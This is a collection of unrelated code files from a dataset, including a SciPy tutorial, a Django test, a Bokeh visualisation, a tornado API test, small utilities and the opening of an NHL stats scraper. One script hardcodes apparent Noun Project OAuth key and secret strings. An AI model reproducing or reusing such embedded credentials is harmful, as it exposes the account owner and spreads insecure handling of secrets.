{"seq_id":"620455348","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport scipy as sp\n\nfrom scipy import fftpack\nfrom scipy import interpolate\nfrom matplotlib import pyplot as plt\n\n###################################################################################\n# Solving a linear system\n# A x = b\n\n## x + 2 y = 1\n## 3 x + 4 y = 2\n\nb = np.array([1, 2])\nA = np.array([[1, 2], [3, 4]])\nprint(b)\nprint(A)\n\nA_inverse = np.linalg.inv(A)\nprint(A_inverse)\n\nx = np.dot(A_inverse,b)\nprint(x)\n\n#### Alternative method\nx = np.linalg.solve(A, b)\nprint(x)\n\n###################################################################################\n#### Fourier transform\n# sampling frequency in Hz\nfe = 100\n# duration in seconds\nT = 10\n# number of points:\nN = T*fe\n# time array:\nt = np.arange(1.,N)/fe\n# signal frequency, in Hz\nf0 = 0.5\n# time-domain signal\nsinus = np.sin(2*np.pi*f0*t)\n# add some noise\nbruit = np.random.normal(0,0.5,N-1)\nsinus2 = sinus + bruit\n# frequency-domain signal: divide by the vector size to normalise the fft\nfourier = fftpack.fft(sinus2)/np.size(sinus2)\n# frequency axis:\naxe_f = np.arange(0.,N-1)*fe/N\n# plot the results\nplt.figure()\nplt.subplot(121)\nplt.plot(t,sinus2,'-')\nplt.plot(t,sinus,'r-')\nplt.xlabel('time axis, in seconds')\nplt.subplot(122)\nplt.plot(axe_f,np.abs(fourier),'x-')\nplt.xlabel('frequency axis, in Hertz')\nplt.show()\n
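\n# (Editor's aside, not in the original TP: with fe = 100 Hz, N = 1000 and f0 = 0.5 Hz,\n# the spectrum above peaks near bin k = f0*N/fe = 5, i.e. at axe_f[5] = 0.5 Hz; and\n# because a real sine's energy is split between positive- and negative-frequency bins,\n# np.abs(fourier[5]) comes out close to 0.5 -- half the unit amplitude -- after the\n# division by np.size(sinus2).)\n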
\n###################################################################################\n###### Interpolation\n# first curve\nt = np.arange(11)\nsinus = np.sin(t)\n# build our quadratic interpolation helper\nF_sinus = interpolate.interp1d(t,sinus,kind='quadratic')\n# second time axis to interpolate onto\nt2 = np.arange(0, 10, 0.5)\n# Interpolation\nsinus2 = F_sinus(t2)\n# Display:\nplt.plot(t, sinus, 'rx-') # RED\nplt.plot(t2, sinus2, 'bd-') # BLUE\nplt.show()\n\n\n","sub_path":"Python - Divers/TP - SciPy.py","file_name":"TP - SciPy.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"358232103","text":"from routes import (\n    redirect,\n    GuaTemplate,\n    html_response,\n)\n\n\ndef index(request):\n    body = GuaTemplate.render('map_editor.html')\n    return html_response(body)\n\n\ndef save_map(request):\n    data = 'guaMapData = `' + request.body + '`'\n    path = 'C:\\\\Users\\\\ljhua\\\\GitHub\\\\gua.game.js\\\\8.18\\\\guagame\\\\gua_map_data.js'\n    # print('data', data)\n    with open(path, 'w+', encoding='utf-8') as f:\n        # log('save', path, s, data)\n        f.write(data)\n        print('write success')\n    return redirect('/')\n\n\ndef route_dict():\n    \"\"\"\n    Route dictionary:\n    the key is the route (the URL path),\n    the value is the handler function (i.e. the response)\n    \"\"\"\n    d = {\n        '/': index,\n        '/save': save_map,\n    }\n    return d\n","sub_path":"8.18/mario_python/routes_mario.py","file_name":"routes_mario.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"361032251","text":"'''\nWrite regular time-series data to example.dss\n'''\nimport numpy as np\nfrom pydsstools.heclib.dss import HecDss\nfrom pydsstools.core import TimeSeriesContainer\n\ndss_file = \"example.dss\"\n\ntsc = TimeSeriesContainer()\ntsc.granularity_value = 60 #seconds i.e. 
minute granularity\ntsc.numberValues = 10\ntsc.startDateTime=\"01 JAN 2017 01:00\"\ntsc.pathname = \"/REGULAR/TIMESERIES/FLOW//1HOUR/WRITE2/\"\ntsc.units = \"cfs\"\ntsc.type = \"INST\"\ntsc.interval = 1\n#must a +ve integer for regular time-series\n#actual interval implied from E part of pathname\ntsc.values =np.array(range(10),dtype=np.float32)\n#values may be list,array, numpy array\n\nfid = HecDss.Open(dss_file)\nstatus = fid.put(tsc)\nfid.close()\n","sub_path":"pydsstools/examples/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468306580","text":"from django.core.exceptions import ValidationError\nfrom django.test import TestCase\nfrom WhereIs.models import ServidorModel\n\n\nclass TestServidor(TestCase):\n def test_model(self) -> None:\n servidor = ServidorModel(ip='12.226.226.11', dominio='tre.com')\n servidor.save()\n servidor.delete()\n\n def test_ip_validation(self) -> None:\n with self.assertRaises(ValidationError):\n servidor = ServidorModel(ip='441.12.2.12')\n servidor.full_clean()\n servidor.save()\n","sub_path":"src/WhereIs/tests/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"64955292","text":"import requests\nimport json\nfrom requests_oauthlib import OAuth1\n\nterm = \"doughnut\"\n\nfor x in range(0, 22):\n auth = OAuth1(\"1d6cea836bd14236a738db46ae3a04e8\", \"d67c77d4234e4953b8b38cf07fbbb18b\")\n endpoint = \"https://api.thenounproject.com/icons/\" + term + \"?page=\" + str(x)\n response = requests.get(endpoint, auth=auth)\n\n with open('./jsons/' + term + '-p' + str(x) + '.json', 'w') as results_file:\n json.dump(response.json(), results_file)\n","sub_path":"final/collect/call-json.py","file_name":"call-json.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"27251245","text":"import threading\nimport queue\nimport re\nimport rx.subject\n\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.plotting import curdoc, figure\nfrom bokeh.layouts import column, row\nfrom bokeh.models import FactorRange, Range1d\nfrom bokeh.models import Select\n\nfrom nanomsgnode import PropellerNodeController, CHANNEL_NAMES\n\nRSSI_HISTORY = 200\n\n\nclass PropellerTimestampProcessor:\n\n CPUFREQ = 80_000_000\n\n def __init__(self):\n self._last_ts = None\n self.signal = rx.subject.Subject()\n\n def __call__(self, timestamp):\n if self._last_ts is not None:\n diff = (timestamp + 2**32 - self._last_ts) % 2**32\n self.signal.on_next(diff / self.CPUFREQ)\n self._last_ts = timestamp\n\n\nclass Visualisation:\n\n def __init__(self, node):\n self._node = node\n self._timestamp_processor = PropellerTimestampProcessor()\n self._lines_q = queue.Queue()\n\n number_of_vtx = node.configuration()[0]\n self._laptime_format = \"> 1\t#移位运算,把num转换成二进制后所有位向后移动一位,高位补0\n\t\tindexBit += 1\t#指针跟上\n\treturn indexBit\t\t#返回最右边第一个是1的位置\ndef IsBit(num, indexBit):\n\t'''\n\t用于判断在num的二进制表示中从右边起的indexBit位是否为1\n\t'''\n\tnum = num >> indexBit\n\treturn num & 1\t\t#0为False,1为True\nx = [2,4,3,6,3,2,5,5]\nprint(FindNumsAppearOnce(x))\n\n'''\n移位运算:\n\t<< n : 是整体向左移动n位\n\t>> n : 
是整体向右移动n位\n'''\n","sub_path":"数据结构与算法/剑指offer/40.数组中只出现一次的数字.py","file_name":"40.数组中只出现一次的数字.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"434505888","text":"import json\nfrom pathlib import Path\n\nDIRPATH = Path(__file__).parent.resolve() / \"data\"\n\nair_molecular_weight = 28.97 # [kg/kmol], molecular weight of air\natmosphere_total_mass = 5.1352e18 # [kg] total mass of atmosphere\n\nfp_substances = DIRPATH / \"ipcc2013.json\"\nwith open(fp_substances, 'rb') as f:\n substances_data = json.load(f)","sub_path":"gwp_uncertainties/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"534960750","text":"#\r\n\r\n\r\nfrom datetime import date, datetime, timedelta\r\nfrom django.utils import formats\r\n\r\nf_date = date(2018, 2, 21)\r\nl_date = date(2018, 7, 11)\r\n\r\ndelta = l_date - f_date\r\nprint(delta.days+2)\r\n\r\nact_level = [1,1.12,1.27,1.54]\r\nb = 152*act_level[0]\r\nprint(b)\r\n#date_format = \"%m/%d/%Y\"\r\n#date_joined = datetime.now().date()\r\n#print(date_joined)\r\n#start_date = date(2018, 2, 2)\r\n#start_date.strftime('%B %d,%Y')\r\n#x = datetime.strptime(start_date, '%B %d,%Y')\r\n#print(start_date)\r\n#new_date = start_date.date()\r\n#print(new_date)\r\n#for i in range(0,32):\r\n # f_date = f_date + timedelta(days=1)\r\n # print(f_date)\r\n # if(f_date==date_joined):\r\n # print(\"found\")\r\n # break\r\n\r\n#a = date_joined[1:4]\r\n#k=date_joined.strftime('%Y/%m/%d')\r\n#a = k[0:4]\r\n#b = k[5:7]\r\n#c= k[8:10]\r\n#l_date = date(int(a), int(b), int(c))\r\n#print((f_date-l_date).days)\r\n#print(a,' ',b,' ',c)\r\n","sub_path":"myproject/myapp/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"552856764","text":"# Copyright (c) 2019. 
All rights reserved.\n\nimport atexit\nfrom io import StringIO\nimport json\nimport unittest\nimport yaml\n\nfrom tornado.ioloop import IOLoop\nimport tornado.testing\n\nfrom addrservice.app import (\n make_addrservice_app,\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR\n)\n\nfrom tests.unit.address_data_test import address_data_suite\n\n\nIN_MEMORY_CFG_TXT = '''\nservice:\n name: Address Book Test\n\naddr-db:\n memory: null\n\ntracing:\n addrservice.tracing.CummulativeFunctionTimeProfiler: null\n addrservice.tracing.Timeline: null\n'''\n\nwith StringIO(IN_MEMORY_CFG_TXT) as f:\n TEST_CONFIG = yaml.load(f.read(), Loader=yaml.SafeLoader)\n\n\nclass TestAddressServiceApp(tornado.testing.AsyncHTTPTestCase):\n def setUp(self) -> None:\n super().setUp()\n self.headers = {'Content-Type': 'application/json; charset=UTF-8'}\n address_data = address_data_suite()\n keys = list(address_data.keys())\n self.assertGreaterEqual(len(keys), 2)\n self.addr0 = address_data[keys[0]]\n self.addr1 = address_data[keys[1]]\n\n def get_app(self) -> tornado.web.Application:\n addr_service, app = make_addrservice_app(\n config=TEST_CONFIG,\n debug=True\n )\n\n addr_service.start()\n atexit.register(lambda: addr_service.stop())\n\n return app\n\n def get_new_ioloop(self):\n IOLoop.configure('tornado.platform.asyncio.AsyncIOLoop')\n instance = IOLoop.instance()\n return instance\n\n def test_liveness(self):\n r = self.fetch(\n '/healthz',\n method='GET',\n headers=None,\n )\n info = json.loads(r.body.decode('utf-8'))\n\n self.assertEqual(r.code, 200, info)\n self.assertGreater(info['uptime'], 0)\n\n def test_readiness(self):\n r = self.fetch(\n '/readiness',\n method='GET',\n headers=None,\n )\n info = json.loads(r.body.decode('utf-8'))\n\n self.assertEqual(r.code, 200, info)\n self.assertTrue(info['ready'])\n self.assertGreater(info['uptime'], 0)\n\n def test_default_handler(self):\n r = self.fetch(\n '/does-not-exist',\n method='GET',\n headers=None,\n )\n # info = json.loads(r.body.decode('utf-8'))\n\n # TODO: Exercise: Tornado, by default, send HTML response on 404.\n # Implement BaseRequestHandler.write_error method to return a JSON\n # response, and hook DefaultRequestHandler to tornado.web.Application\n # creation with suitable args so that the last two assert statements\n # of this test function start passing.\n info = r.body\n # print(info)\n\n self.assertEqual(r.code, 404, info)\n # self.assertEqual(info['code'], 404)\n # self.assertEqual(info['message'], 'Unknown Endpoint')\n\n # TODO: Exercise: rename this function to test_address_book_endpoints\n def test_address_book_endpoints(self):\n # Get all addresses in the address book, must be ZERO\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='GET',\n headers=None,\n )\n all_addrs = json.loads(r.body.decode('utf-8'))\n self.assertEqual(r.code, 200, all_addrs)\n self.assertEqual(len(all_addrs), 0, all_addrs)\n\n # Add an address\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='POST',\n headers=self.headers,\n body=json.dumps(self.addr0),\n )\n self.assertEqual(r.code, 201)\n addr_uri = r.headers['Location']\n\n # POST: error cases\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='POST',\n headers=self.headers,\n body='it is not json',\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'Invalid JSON body')\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='POST',\n headers=self.headers,\n body=json.dumps({}),\n )\n self.assertEqual(r.code, 400)\n 
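# (Editor's aside, not part of the original test: an empty JSON object parses fine, so\n        # the request gets past the 'Invalid JSON body' check above and fails schema\n        # validation instead -- a sketch of the shape of that check, using a purely\n        # hypothetical schema:\n        #     import jsonschema\n        #     jsonschema.validate({}, {\"type\": \"object\", \"required\": [\"full_name\"]})\n        #     # raises jsonschema.ValidationError, surfaced as the 400 reason below\n        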
self.assertEqual(r.reason, 'JSON Schema validation failed')\n\n # Get the added address\n r = self.fetch(\n addr_uri,\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 200)\n self.assertEqual(self.addr0, json.loads(r.body.decode('utf-8')))\n\n # GET: error cases\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id='no-such-id'),\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 404)\n\n # Update that address\n r = self.fetch(\n addr_uri,\n method='PUT',\n headers=self.headers,\n body=json.dumps(self.addr1),\n )\n self.assertEqual(r.code, 204)\n\n r = self.fetch(\n addr_uri,\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 200)\n self.assertEqual(self.addr1, json.loads(r.body.decode('utf-8')))\n\n # PUT: error cases\n r = self.fetch(\n addr_uri,\n method='PUT',\n headers=self.headers,\n body='it is not json',\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'Invalid JSON body')\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id='1234'),\n method='PUT',\n headers=self.headers,\n body=json.dumps(self.addr1),\n )\n self.assertEqual(r.code, 404)\n r = self.fetch(\n addr_uri,\n method='PUT',\n headers=self.headers,\n body=json.dumps({}),\n )\n self.assertEqual(r.code, 400)\n self.assertEqual(r.reason, 'JSON Schema validation failed')\n\n # Delete that address\n r = self.fetch(\n addr_uri,\n method='DELETE',\n headers=None,\n )\n self.assertEqual(r.code, 204)\n r = self.fetch(\n addr_uri,\n method='GET',\n headers=None,\n )\n self.assertEqual(r.code, 404)\n\n # DELETE: error cases\n r = self.fetch(\n addr_uri,\n method='DELETE',\n headers=None,\n )\n self.assertEqual(r.code, 404)\n\n # Get all addresses in the address book, must be ZERO\n r = self.fetch(\n ADDRESSBOOK_ENTRY_URI_FORMAT_STR.format(id=''),\n method='GET',\n headers=None,\n )\n all_addrs = json.loads(r.body.decode('utf-8'))\n self.assertEqual(r.code, 200, all_addrs)\n self.assertEqual(len(all_addrs), 0, all_addrs)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/integration/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521166745","text":"from availability import get_availability\n# from store import get_bj_stores_number\nfrom store import get_sz_stores_number\n\n\ndef check_availability(checkStores, strWantedModel):\n avai = get_availability()\n yoho = []\n res = {}\n for store_num, store_name in checkStores:\n model_avai = avai['stores'][store_num][strWantedModel]['availability']\n res[store_name] = model_avai\n if model_avai['contract'] or model_avai['unlocked']:\n yoho.append(store_name)\n print('有货:store_num[%s] store_name[%s] model[%s]' % (store_num, store_name, model_avai))\n return res, yoho\n\n\nif __name__ == '__main__':\n check_stores = get_sz_stores_number()\n res, yoho = check_availability(check_stores,'MGLD3CH/A')\n print(res)\n print(yoho)\n","sub_path":"check_availability.py","file_name":"check_availability.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"603358590","text":"def command_operator(order):\r\n if order == options_list[0] or order == options_list[3]:\r\n task = input(\"what task would you like to add to your list?: \")\r\n if task == \"exit_task_list\":\r\n return \"exit_the_task_list\"\r\n task_list.append(task)\r\n if task != \"exit_task_list\":\r\n return \"running\"\r\n 
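# (Editor's note, not in the original script: options_list is\r\n    # [\"addtask\", \"viewtasks\", \"exitprogram\", \"1\", \"2\", \"3\"], so every command shares a\r\n    # branch with its numeric alias three positions later -- options_list[0]/\"addtask\"\r\n    # pairs with options_list[3]/\"1\" above, and the branch below pairs\r\n    # options_list[1]/\"viewtasks\" with options_list[4]/\"2\".)\r\n    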
elif order == options_list[1] or order == options_list[4]:\r\n print(\"your tasks:\")\r\n tasks_in_list = len(task_list)\r\n x = range(0, tasks_in_list, 1)\r\n b = 0\r\n for n in x:\r\n b += 1\r\n print(\"{}.\".format(b), task_list[n])\r\n Y_or_N = input(\"would you like to change or remove or add completion confirmation to a task from the list? Enter ['Y'] or ['N']: \").strip().upper()\r\n while Y_or_N != \"Y\" or Y_or_N != \"N\":\r\n if Y_or_N == \"Y\" or Y_or_N == \"N\":\r\n break\r\n print(\"please answer ['Y'] or ['N']\")\r\n Y_or_N = input(\"would you like to change or remove or add completion confirmation to a task from the list?: \").strip().upper()\r\n if Y_or_N == \"Y\" or Y_or_N == \"N\":\r\n break\r\n if Y_or_N == \"Y\":\r\n xtra = 0\r\n task_number = 1000**10\r\n while type(task_number) != int or task_number > tasks_in_list or type(task_number) != int and task_number > tasks_in_list:\r\n xtra += 1\r\n\r\n if xtra == 1:\r\n task_number = input(\"select the number of the task (please use numericals e.g. 1, 2, 3, etc): \")\r\n else:\r\n task_number = input(\"please use valid numericals (e.g. 1, 2, 3, etc): \")\r\n if type(task_number) != int:\r\n try:\r\n task_number = int(task_number)\r\n except:\r\n task_number = input(\"please use valid numericals (e.g. 1, 2, 3, etc): \")\r\n else:\r\n task_number = int(task_number)\r\n\r\n task_change = input(\"type what you want to change your task to or if you want to remove or confirm a task, type the command [remove]/[completion]/[change]: \").strip().lower()\r\n edit_commands = [\"remove\", \"completion\", \"change\"]\r\n while task_change not in edit_commands:\r\n task_change = input(\"please type the command [remove]/[completion]/[change]: \").strip().lower()\r\n\r\n task_number -= 1\r\n if task_change.lower().strip() == \"change\":\r\n task_list[task_number] = input(\"please type what you would like to change this task to: \")\r\n elif task_change.lower().strip() == \"completion\":\r\n task_list[task_number] = \"{} - completed\".format(task_list[task_number])\r\n elif task_change.lower().strip() == \"remove\":\r\n task_list.remove(task_list[task_number])\r\n else: \r\n return \"halt\"\r\n \r\n \r\n \r\n\r\n\r\nuser_name = input(\"greetings user, what is your name?: \")\r\nprint(\"hello user {}. It's nice to meet you.\".format(user_name))\r\n\r\nglobal task_list\r\nglobal options_list\r\noptions_list = [\"addtask\", \"viewtasks\", \"exitprogram\",\"1\",\"2\",\"3\"]\r\ntask_list = []\r\n\r\nprint(\"what would you like to do out of the following options {}?\".format(user_name))\r\nprint(\"1. add a task to your to do list \\n2. view current tasks in list \\n3. 
exit the program\")\r\norder = input(\"to select one of the following, please enter the number of your objective or the following comands: ['add task', 'view tasks', 'exit program']: \")\r\nloop = 0\r\norder = str(order).strip().lower().replace(\" \",\"\")\r\nwhile order not in options_list[2] or order not in options_list[5]:\r\n if order in options_list[2] or order in options_list[5]:\r\n break\r\n if loop > 0:\r\n order = input(\"please enter the number of your objective or the following comands: ['add task', 'view tasks', 'exit program']: \")\r\n order = str(order).strip().lower().replace(\" \",\"\")\r\n loop += 1\r\n while order not in options_list:\r\n print(\"command {} unrecognised\".format(order))\r\n order = input(\"to select one of the following, please enter the number of your objective or the following comands: ['add task', 'view tasks', 'exit program']: \")\r\n order = str(order).strip().lower().replace(\" \",\"\")\r\n if order in options_list[2] or order in options_list[5]:\r\n break\r\n if order in options_list[0] or order in options_list[3]:\r\n print(\"type command ['exit_task_list'] if you want to stop adding tasks.\")\r\n if order in options_list[1] or order in options_list[4]:\r\n program_status = command_operator(order)\r\n else:\r\n command_operator(order)\r\n program_status = \"running\"\r\n while program_status != \"exit_the_task_list\" and program_status == \"running\":\r\n program_status = command_operator(order)\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\nprint(\"bye-bye.\")\r\n\r\n\r\n \r\n ","sub_path":"Yr12 - to do list task (final, finished version), python revision.py","file_name":"Yr12 - to do list task (final, finished version), python revision.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"491211006","text":"#! 
/usr/bin/python\r\nimport math\r\n\r\ntesting_data_file = input(\"Please input the relative path to the testing data file: \")\r\nparameter_file = input(\"Please input the relative path to the parameter data file: \")\r\noutput_file = input(\"Please input the relative path to the file that will contain the output data: \")\r\n\r\n# Parse the testing data:\r\nclasses = []\r\nX = []\r\nwith open(testing_data_file, 'r') as f:\r\n K = int(f.readline())\r\n D = int(f.readline())\r\n current = f.readline()\r\n while current != '':\r\n classes.append(int(current))\r\n current_input = []\r\n for i in range(1, 17):\r\n current_input.extend(map(int, f.readline().split()))\r\n X.append(current_input)\r\n current = f.readline()\r\n\r\navailable_classes = range(1, K + 1)\r\navailable_dimensions = range(D)\r\nN = len(classes)\r\n\r\n# Parse the parameters:\r\npriors = {}\r\nmeans = {}\r\nvariances = []\r\nwith open(parameter_file, 'r') as f:\r\n f.readline() # 'd'\r\n f.readline() # K\r\n f.readline() # D\r\n for k in available_classes:\r\n f.readline()\r\n priors[k] = float(f.readline())\r\n means[k] = list(map(float, f.readline().split()))\r\n variances = list(map(float, f.readline().split()))\r\n\r\n\r\ndef conditional_probability(observation, k):\r\n exponent = sum([math.pow(observation[d] - means[k][d], 2) / variances[d] for d in available_dimensions])\r\n return priors[k] * math.exp(-.5 * exponent)\r\n\r\n# Calculate error rate and confusion matrix:\r\nerrors = 0\r\nconfusion = [[0] * K for k in available_classes]\r\nfor (x, k_x) in zip(X, classes):\r\n conditional_probabilities_by_class = {k: conditional_probability(x, k) for k in available_classes}\r\n max_k = max(conditional_probabilities_by_class, key=conditional_probabilities_by_class.get)\r\n\r\n confusion[k_x - 1][max_k - 1] += 1\r\n if max_k != k_x:\r\n errors += 1\r\n\r\n# Write error rate and confusion matrix into output file:\r\nwith open(output_file, 'w') as output:\r\n def write_line(text):\r\n output.write(str(text) + \"\\n\")\r\n\r\n write_line(str(errors / len(X)))\r\n for row in confusion:\r\n write_line(\"\\t\".join(map(str,row)))\r\n","sub_path":"Exercise3/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380183853","text":"# data path and files in that folder\r\ndataset_Path=\"C:/NLP_homeworks/hw_3/dataset/\"\r\nfiles=[\"dataset.sentences\", \"dataset.labels\", \"int-keywords.txt\", \"featuresAdvancedCase.txt\" ]\r\n\r\nsentences = [line.split() for line in open(dataset_Path+files[3])]\r\nclassLabels=[line.rstrip() for line in open(dataset_Path+files[1])]\r\nintRelatedWords=[line.rstrip() for line in open(dataset_Path+files[2])]\r\n\r\n# all data in the variable SENTENCES now\r\n\r\ndef create2D_Table_with_zeros(m,n):\r\n import random\r\n set=[0,0]\r\n # Create a list.\r\n table1 = []\r\n for i in range(m):\r\n table1.append([])\r\n for j in range(n):\r\n table1[i].append(0) #random.choice(set))\r\n #for i in range(n):\r\n # print(table1[i],end=\"\\n\")\r\n return table1\r\n# for baseline\r\ntraining_x_baseline=create2D_Table_with_zeros(3000,len(sentences[0])-3)\r\ntraining_y_baseline=create2D_Table_with_zeros(3000,1)\r\n\r\ntest_x_baseline=create2D_Table_with_zeros(len(sentences)-3000,len(sentences[0])-3)\r\ntest_y_baseline=create2D_Table_with_zeros(len(sentences)-3000,1)\r\n\r\nfor i in range(3000):\r\n \r\n for j in range(len(sentences[i])-3):\r\n pass\r\n 
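# (Editor's note, not in the original file: each row of `sentences` carries the\r\n        # feature values with the class label in the last column, so this loop copies the\r\n        # leading columns into the 3000-row training matrix while the label lands in the\r\n        # one-column training_y table below.)\r\n        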
training_x_baseline[i][j]=sentences[i][j]\r\n\r\n    training_y_baseline[i][0]=sentences[i][-1]\r\n\r\n\r\n\r\nfor i in range(len(sentences)-3000):\r\n    for j in range(len(sentences[i])-3):\r\n        test_x_baseline[i][j]=sentences[i][j]\r\n\r\n    test_y_baseline[i][0]=sentences[i][-1]\r\n\r\n\r\n\r\n# for advanced line\r\ntraining_x_advanced=create2D_Table_with_zeros(3000,len(sentences[0])-1)\r\ntraining_y_advanced=create2D_Table_with_zeros(3000,1)\r\n\r\ntest_x_advanced=create2D_Table_with_zeros(len(sentences)-3000,len(sentences[0])-1)\r\ntest_y_advanced=create2D_Table_with_zeros(len(sentences)-3000,1)\r\n \r\nfor i in range(3000):\r\n    \r\n    for j in range(len(sentences[i])-1):\r\n        training_x_advanced[i][j]=sentences[i][j]\r\n\r\n    training_y_advanced[i][0]=sentences[i][-1]\r\n\r\n\r\n\r\nfor i in range(len(sentences)-3000):\r\n    for j in range(len(sentences[i])-1):  # match the width of the advanced training features\r\n        test_x_advanced[i][j]=sentences[i][j]\r\n\r\n    test_y_advanced[i][0]=sentences[i][-1]\r\n\r\nfrom sklearn import svm\r\n\r\n\r\nimport scipy\r\n","sub_path":"readFeatureData.py","file_name":"readFeatureData.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"303956958","text":"from sklearn.decomposition import PCA\nfrom sklearn import svm\n\nimport numpy as np\nimport pandas as pd\n\n# The competition datafiles are in the directory ../input\n# Read competition data files:\ndata = pd.read_csv(\"../input/train.csv\")\ntarget = data[[0]].values.ravel()\ntrain = data.iloc[:, 1:].values\ntest = pd.read_csv(\"../input/test.csv\").values\n\npca_model = PCA(n_components=10, copy=False, whiten=True)\ntrain = pca_model.fit_transform(train)\ntest = pca_model.transform(test)\n\nsvm_model = svm.SVC()\nsvm_model.fit(train, target)\n\nprediction = svm_model.predict(test)\nnp.savetxt('submission_pca_svm.csv', np.c_[range(1, len(test) + 1), prediction], delimiter=',', comments = '', header = 'ImageId,Label', fmt='%d')","sub_path":"digit/digit_pca_svm.py","file_name":"digit_pca_svm.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"177666811","text":"import numpy as np\r\nimport math\r\nimport scipy\r\nfrom scipy.optimize import fsolve\r\nfrom scipy import special\r\n\r\n#matplotlib inline\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import interpolate\r\n\r\nF = 36\r\nZ = 10\r\nCWmin = 8\r\nBI = 10\r\nL = 1\r\nmu = 3 # mean packet reception time\r\nS=7\r\nM = 7\r\nTb = (BI - Z*L)/Z\r\n\r\nalpha= 1-math.exp((-1/mu)*(Tb))\r\n\r\nbeta=1-math.exp((-1/mu)*(Tb+L))\r\n\r\nN = 1\r\n\r\nF = 36\r\n\r\nWmin = 8\r\nWmax = 1024\r\nM = 7\r\n# 8 16 32 64 128 256 512 1024\r\n\r\ndef W(i):\r\n    return 2**i*Wmin\r\n\r\ndef delta(a,b):\r\n    if a==b:\r\n        return 1\r\n    else:\r\n        return 0\r\n\r\ndef Vfunc(i):\r\n    return int(math.ceil( ((math.pow(2,i)) * Wmin -1 )/F))\r\n\r\ndef supereqEZ(p):\r\n    if N==0 or N==1 or F==0:\r\n        return p\r\n    else:\r\n        return F*( 1 - math.pow(1.-p,1./(N-1)))*(1-p) - 1/((1-alpha)/beta + (1/(1-p) + math.fsum([ (1-delta(Vfunc(i),0))*(1 - (2 + Vfunc(i)*F)/((2**(i+1))*Wmin) )*(Vfunc(i)-1)*(p**i) for i in range(S)])\\\r\n+ (1-delta(Vfunc(S),0))*( 1 - (2 + Vfunc(S)*F)/((2**(S+1))*Wmin) )*(Vfunc(S)-1)*(p**S)/(1-p)))\r\n\r\ndef findtau(p):\r\n    if N==0:\r\n        return 0\r\n    if N==1:\r\n        return math.pow((1+(1-alpha)/beta),-1)\r\n    else:\r\n        return F*( 1 - math.pow(1.-p,1./(N-1)))\r\n\r\n\r\ndef H(i,k):\r\n    if ((k==(Vfunc(i)-1)) and 
(Vfunc(i)==1)):\r\n return int((W(i)-2)%F + 2)\r\n if ((k==(Vfunc(i)-1)) and (Vfunc(i)!=1)):\r\n return int((W(i)-2)%F + 1)\r\n if (k==0):\r\n return F+1\r\n if ((0 and\n.\n\n\nExample usage, reading playerstats:\n\nq = Query()\nq.season(\"20142015\")\nq.gametype(\"regular\")\nq.report(\"summary\")\n\nfor row in q:\n print (row)\n\n\nExample usage, getting career stats tables for a specific Player:\n\np = Player(8474577)\nprint (p.tables)\n\n\"\"\"\n\nfrom urllib.parse import urlencode, parse_qs\nfrom urllib.request import urlparse\nfrom urllib.request import urlopen\nfrom lxml import etree\nimport re\n\n\nPAGES = {}\n\n\nclass NHlException(Exception):\n pass\n\n\ndef getdoc(url):\n \"\"\"Returns the HTML DOM as an etree Elementree\"\"\"\n if url not in PAGES:\n try:\n response = urlopen(url)\n content = response.read().decode('utf-8')\n parser = etree.HTMLParser()\n except Exception as e:\n raise SystemExit(e)\n\n PAGES[url] = etree.fromstring(content, parser)\n\n return PAGES[url]\n\n\ndef stringify(element):\n 